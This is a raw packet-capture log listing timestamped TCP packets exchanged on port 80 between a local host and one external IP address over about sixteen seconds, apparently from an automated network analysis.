Apr 26, 2024 04:42:15.812758923 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.814851046 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.005460024 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.005577087 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.194444895 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.929127932 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.929291010 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.929332018 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.929385900 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.929466963 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.929519892 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.929522991 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.929567099 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.939404964 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.939455986 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.939680099 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.939763069 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.939841986 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.939908981 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.939990997 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.940043926 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.940095901 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.940140963 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:16.940192938 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:16.940241098 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.061475992 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.119260073 CEST	80	49745	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:17.119317055 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.249260902 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:17.249453068 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.251353025 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.439852953 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:17.439920902 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:17.629278898 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.335382938 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.335588932 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.335608959 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.335690022 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.335757017 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.335757017 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.344870090 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.344933987 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.344940901 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.345019102 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.345051050 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.345182896 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.345227957 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.345228910 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.345417976 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.345484018 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.346054077 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.496764898 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.522072077 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.522166967 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.522195101 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.522231102 CEST	80	49747	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.522267103 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.522356987 CEST	49747	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.685905933 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.685981035 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.687769890 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:18.874816895 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:18.879486084 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.066554070 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.788387060 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.788469076 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.788501978 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.788585901 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.788588047 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.788636923 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.797753096 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.797810078 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798095942 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798149109 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798274040 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798316956 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798572063 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798621893 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798681974 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798770905 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798808098 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798825979 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.798829079 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.798871040 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.928029060 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.975981951 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.976073027 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:19.976145029 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.976162910 CEST	80	49750	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:19.976229906 CEST	49750	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:20.114891052 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:20.114996910 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:20.116741896 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:20.304984093 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:20.305181980 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:20.491075039 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.274584055 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.274991035 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.275067091 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.275083065 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.275131941 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.275131941 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.285012007 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285587072 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285641909 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.285641909 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.285692930 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285736084 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285778999 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.285875082 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285902023 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.285906076 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.285907030 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.286083937 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.286123991 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.424309015 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.462066889 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.462089062 CEST	80	49753	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.462268114 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.462269068 CEST	49753	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.611303091 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.611377001 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.613500118 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.799943924 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:21.800147057 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:21.985280991 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.861709118 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.861835003 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.861901999 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.861953974 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.861960888 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.862000942 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.862129927 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.862179041 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.869213104 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.869271994 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.869570017 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.869615078 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.869750977 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.869801044 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.869832039 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.869875908 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.870012999 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.870054007 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:22.870075941 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:22.870115995 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.000184059 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.047796011 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:23.047812939 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:23.047823906 CEST	80	49754	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:23.047960997 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.047992945 CEST	49754	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.186719894 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:23.186841011 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.188582897 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.375740051 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:23.375848055 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:23.562638998 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.372457981 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.372570038 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.372594118 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.372632980 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.372946024 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.373008966 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.373023033 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.373063087 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.373349905 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.373395920 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.391850948 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.391897917 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.398499012 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.398554087 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.398801088 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.398849010 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.398905039 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.398958921 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.399126053 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.399164915 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.516129017 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.560373068 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.560539961 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.560708046 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.560748100 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.560806036 CEST	80	49755	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.560847044 CEST	49755	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.703871012 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.704215050 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.705957890 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:24.893593073 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:24.893776894 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.081772089 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.840161085 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.840221882 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.840302944 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.840303898 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.840321064 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.840374947 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.850430012 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.850496054 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.850716114 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.850791931 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.850928068 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.850986004 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.851033926 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.851089001 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.851181984 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.851233959 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.851278067 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.851329088 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.851353884 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:25.851406097 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:25.989048004 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.027713060 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:26.027874947 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:26.027944088 CEST	80	49756	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:26.027996063 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.027997017 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.028086901 CEST	49756	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.177704096 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:26.177793980 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.179564953 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.369550943 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:26.369642973 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:26.556637049 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.333605051 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.333698034 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.334165096 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.334176064 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.334218979 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.334234953 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.334336996 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.334388018 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.334420919 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.334461927 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.334600925 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.334640026 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.348891020 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.348948002 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.349037886 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.349093914 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.349114895 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.349162102 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.349315882 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.349359035 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.475799084 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.522842884 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.522881031 CEST	80	49757	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.522908926 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.522923946 CEST	49757	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.663733006 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.663816929 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.665906906 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:27.852828979 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:27.852904081 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.040564060 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.809050083 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.809174061 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.809180021 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.809226990 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.809266090 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.809331894 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.809453964 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.809494019 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.829871893 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.829926014 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.831037045 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.831084013 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.831212044 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.831255913 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.831322908 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.831382990 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.831470013 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.831513882 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.831548929 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.831590891 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.958228111 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.998311996 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.998389006 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.998447895 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.998496056 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:28.998533010 CEST	80	49758	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:28.998596907 CEST	49758	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:29.144730091 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:29.144810915 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:29.146660089 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:29.335532904 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:29.335643053 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:29.523210049 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.546466112 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.546561956 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.546581030 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.546612978 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.546730995 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.546782017 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.567848921 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.567914963 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.568367958 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.568427086 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.568507910 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.568557978 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.568613052 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.568639040 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.568659067 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.568675995 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.568696976 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.568717003 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.700536966 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.735188961 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.735337973 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.735342979 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.735374928 CEST	80	49759	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.735384941 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.735421896 CEST	49759	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.888511896 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:30.888611078 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:30.890482903 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.079344988 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.079432964 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.266982079 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.972002983 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.972035885 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.972121954 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.972186089 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.980283022 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.980451107 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.980513096 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.980593920 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.980639935 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.980775118 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.980952024 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.981331110 CEST	80	49760	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:31.981378078 CEST	49760	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:31.981400013 CEST	80	49760	45.77.223.48	192.168.2.4
